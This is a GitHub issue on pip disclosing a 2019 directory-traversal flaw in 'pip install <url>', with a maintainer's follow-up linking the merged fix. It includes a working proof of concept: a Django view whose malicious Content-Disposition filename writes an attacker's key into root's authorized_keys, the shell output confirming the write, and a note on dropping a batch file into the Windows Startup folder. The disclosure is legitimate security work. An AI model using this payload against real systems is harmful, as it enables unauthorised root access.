Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

pip install <url> allow directory traversal, leading to arbitrary file write #6413

gzpan123 opened this issue Apr 16, 2019 · 1 comment


Copy link

@gzpan123 gzpan123 commented Apr 16, 2019


  • pip version: pip 19.0.3
  • Python version: Python 2.7.15 / Python 2.7.15
  • OS: Ubuntu 16.04 / Windows 10


This is a security vulnerability.

when installing a remote package via a specified URL "pip install <url>", A malicious server (or a network MitM if downloading over HTTP) can send a Content-Disposition header with filename which contains "../", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution.

issue occurs in _download_http_url in src/pip/_internal/


for linux, pip usually requires root privileges, we can write following files to get root shell:

for windows, we can write a batch file to the user startup dir, lead to command execution on next boot:
C:\Users<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

for malicious header:

from django.http import HttpResponse

def linux(request):
    response = HttpResponse("malicious public key\n")
    filename = "../../../../../root/.ssh/authorized_keys"
    response['Content-Type'] = 'RANDOM' # avoid mimetypes.guess_extension guess ext
    response['Content-Disposition'] = 'attachment;filename="{0}"'.format(filename)
    return response

pip install malicious url result:

root@DESKTOP-FRESH:~# pip install
Looking in indexes:
  Cannot unpack file /root/.ssh/authorized_keys (downloaded from /tmp/pip-req-build-UAVkjW, content-type: RANDOM); cannot detect archive format
Cannot determine archive format of /tmp/pip-req-build-UAVkjW
root@DESKTOP-FRESH:~# cat /root/.ssh/authorized_keys
malicious public key

similar issue:

Copy link

@cjerdonek cjerdonek commented Jun 9, 2019

@gzpan123 posted a PR for this here: #6418


cjerdonek added a commit to gzpan123/pip that referenced this issue Jun 11, 2019
cjerdonek added a commit that referenced this issue Jun 11, 2019
FIX #6413 pip install <url> allow directory traversal
@lock lock bot added the S: auto-locked label Jul 11, 2019
@lock lock bot locked as resolved and limited conversation to collaborators Jul 11, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

2 participants